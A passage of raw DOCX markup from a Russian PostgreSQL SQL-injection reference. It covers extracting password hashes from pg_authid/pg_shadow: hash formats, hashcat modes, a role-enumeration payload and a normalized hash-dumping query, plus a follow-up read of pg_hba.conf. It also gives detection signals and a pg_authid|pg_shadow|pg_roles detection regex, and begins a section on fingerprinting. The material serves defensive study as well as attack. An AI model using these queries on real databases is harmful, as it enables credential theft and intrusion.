        <w:t xml:space="preserve">. ACL view наследуется от owner-а, но для системных view сам view имеет дефолтный REVOKE → SELECT доступен только тому, кто имеет доступ к base table (т.е. SUPERUSER).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 отдельный view, в котором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заменён на литерал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SELECT-листе. SELECT на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выдан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Это работает потому, что view не обращается к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_authid.rolpassword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для возврата значения — он возвращает константу. Поэтому через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хеш получить нельзя даже superuser-у (только через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напрямую).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Формат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md5&lt;hex32&gt;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'md5' || encode(md5(password || rolname), 'hex')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Salt-ом служит само имя роли — это означает, что одинаковые пароли разных пользователей дают разные хеши, но переименование пользователя инвалидирует хеш (нужно ALTER USER ... PASSWORD).</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SCRAM-SHA-256$&lt;i&gt;:&lt;salt&gt;$&lt;storedKey&gt;:&lt;serverKey&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RFC 5802. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;i&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — число итераций PBKDF2; salt — random per role; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">storedKey</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serverKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — производные ключи. Подбор требует знания всего формата; hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-m 28600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> парсит его нативно.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NULL — пароль не установлен; login возможен только через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_hba.conf trust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peer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ident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или через клиентский сертификат.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password_encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> GUC (PG 10+) определяет, какой алгоритм используется при следующем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER USER ... PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. С PG 14 дефолт — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scram-sha-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">существующие хеши не пересчитываются</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при изменении GUC — нужен явный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER USER ... PASSWORD '...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для каждой роли.</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PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14–17. Структура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и формат SCRAM-SHA-256 стабильны с PG 10 (где SCRAM появился) и 13 (где SCRAM стал дефолтом). С PG 14 — alternative path через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(см. ниже).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 требуются.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 (Payload A):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PUBLIC. См. таблицу в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.0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 (Payload B):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUPERUSER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">или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(с PG 14+). На managed эти роли структурно недоступны — см. блок «Версии».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Конфиги GUC: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password_encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> влияет только на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">новые</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> хеши, существующие можно прочитать всегда (в их формате).</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от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">любой</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не-superuser роли — однозначный сигнал атаки (запрос провалится с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">permission denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но сам факт запроса попадёт в лог). Для application-кода нет use case даже близко.</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от superuser-сессии — два сценария: (а) операции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER USER ... PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через сам PG (не читает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напрямую, а делает UPDATE); (б) backup-инструменты (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_dumpall --globals-only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — читает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для дампа ролей). Сигнал атаки: запрос к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от superuser-а без сопровождающих DDL-команд и не в окне backup.</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от application-роли — обычно норма (ORM/мигратор спрашивают «существует ли роль X»). Атака — массовый SELECT всех ролей с конкатенацией флагов (Payload A) — нормализованный запрос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имеет характерный отпечаток.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нормализованный Payload B выглядит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT $1, rolname || $2 || COALESCE(rolpassword, $3), rolvaliduntil FROM pg_authid WHERE rolcanlogin = $4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — единственный матч на эту нормализованную форму = атака.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Маркер в логах: ошибка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">permission denied for table pg_authid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от application-роли — попытка чтения каталога без прав. Это полезный сигнал — он говорит, что атакующий уже знает про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и пробует, но ещё не эскалировался. Сразу после такой ошибки имеет смысл искать в логах попытки 3.13 от той же сессии.</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14–17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. На PG 13 и ниже — отсутствует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Payload B требует строго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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B структурно недоступен на всех major-провайдерах.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> На AWS RDS роль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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет SUPERUSER-флага в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(это специальная роль с подмножеством superuser-прав), SELECT на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блокируется.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на RDS не выдаётся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На Google Cloud SQL — аналогично,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ограничена. На Supabase — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">service_role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (это внутренняя таблица Supabase, не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но к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доступа нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A (`pg_roles`) работает везде</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий видит все роли с пометками флагов, включая internal-роли провайдера (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rds_pgaudit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cloudsqliamuser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supabase_admin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supabase_auth_admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — это полезный fingerprint самого провайдера. Детально по провайдерам —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Self-hosted:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload B работает в полном объёме при наличии superuser-эскалации (3.13).</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — цепочка получения SUPERUSER, без которой Payload B не применим. После 3.13 → 3.8.3 как post-exploitation для долгосрочного persistence.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 (RLS bypass)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rolbypassrls = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (видно через Payload A) — атакующий идентифицирует роли, которые могут быть целью SET ROLE для обхода RLS.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — после Payload B имеет смысл прочитать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pg_read_file('pg_hba.conf')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — там видно, какие подсети/пользователи имеют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">trust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peer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (вход без пароля), это упрощает использование подобранных аккаунтов.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в regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">METADATA_RECON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.8.1) добавить ветку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_authid|pg_shadow|pg_roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">с разным risk_score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pg_authid|pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 10 (post-exploitation после superuser, очень узкое legitimate use),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 6 (используется в ORM, более частые ложные срабатывания). Сводный regex для всей категории 3.8 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.8.md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Catalogs — pg_authid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Views — pg_roles / pg_shadow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Predefined Roles — pg_read_all_data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Password Authentication — SCRAM-SHA-256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RFC 5802: SCRAM mechanism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hashcat modes — PostgreSQL MD5 (m=12), SCRAM-SHA-256 (m=28600)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pg_authid / pg_shadow extraction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section</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.4 Fingerprinting — version(), GUC-параметры, pg_extension</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Точная версия PG, ОС хоста, set установленных расширений и значения ключевых GUC-параметров — это входные данные для выбора применимых техник из всего остального документа: какие CVE из раздела 4 актуальны, доступны ли OOB-векторы (3.6 требует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работают ли RCE-цепочки (3.7 требует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какие пути к файлам подставлять в file-read payload-ы (3.6.3 — Linux vs Windows), какие пути обхода RLS из 3.17 применимы (зависит от минор-версии). На практике 3.8.4 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">первый</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> запрос после получения точки инъекции, до 3.8.1/3.8.2: знание версии меняет последующие payload-ы.</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app/api/v1/feed.py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@router.get("/feed")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def feed(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
